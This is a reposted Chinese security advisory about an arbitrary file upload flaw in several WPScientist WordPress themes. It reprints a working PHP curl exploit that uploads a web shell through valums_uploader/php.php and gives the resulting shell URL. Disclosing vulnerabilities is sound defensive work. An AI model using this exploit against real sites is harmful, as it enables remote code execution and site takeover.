Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / WordPress 多个WPScientist主题任意文件上传漏洞

发布日期:2013-01-04
更新日期:2013-01-06受影响系统:
WordPress Eptonic Theme 1.x
 WordPress Lightspeed Theme 1.x
 WordPress Nuance Theme 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57152
 
WPScientist是WordPress上使用的一系列主题。
 
WordPress使用的多个WPScientist主题存在安全漏洞,valums_uploader/php.php脚本允许上传任意扩展名的文件到webroot内的文件夹,通过上传恶意PHP脚本,可导致执行任意PHP代码。
 
有漏洞的主题:
 Lightspeed v1.1.2
 Eptonic v1.4.3
 Nuance v1.2.3
 
<*来源:JingoBD
 
 链接:http://secunia.com/advisories/51714/
       http://www.securelist.com/en/advisories/51714
       http://packetstormsecurity.com/files/119241/WordPress-Valums-Uploader-Shell-Upload.html
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit
 # Date: 4-1-2013
 # Author: JingoBD
 # Tested on: Windows 7 And Ubuntu
 # Team: BANGLADESH CYBER ARMY
 # Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. :D 
          ALSO ALL BANGLADESHI Hacker Team.. 
 
=================== EXPLOIT====================
 <?php
 
$uploadfile="bangla.php";
$ch =
 curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");
 curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
 array("qqfile"=>"@$uploadfile"));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 $postResult = curl_exec($ch);
 curl_close($ch);
 print "$postResult";
 
?>
 
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php
 
=========================END======================建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://themeforest.net/item/eptonic-beyond-the-limits/241366WordPress Google Doc Embedder插件任意文件泄露漏洞Lookout for Android “Missing Device”功能欺骗漏洞相关资讯      WordPress安全漏洞 
  • Wordpress Lazy SEO插件Shell上传  (09/23/2013 18:12:26)
  • WordPress crypt_private()远程拒  (06/30/2013 06:24:06)
  • WordPress ProPlayer 插件"id"参数  (05/23/2013 20:13:32)
  • WordPress HMS Testimonials 2.0.  (08/10/2013 14:28:41)
  • WordPress Image Slider with   (05/29/2013 19:27:42)
  • WordPress WP Cleanfix 插件"  (05/21/2013 19:36:23)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论<
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图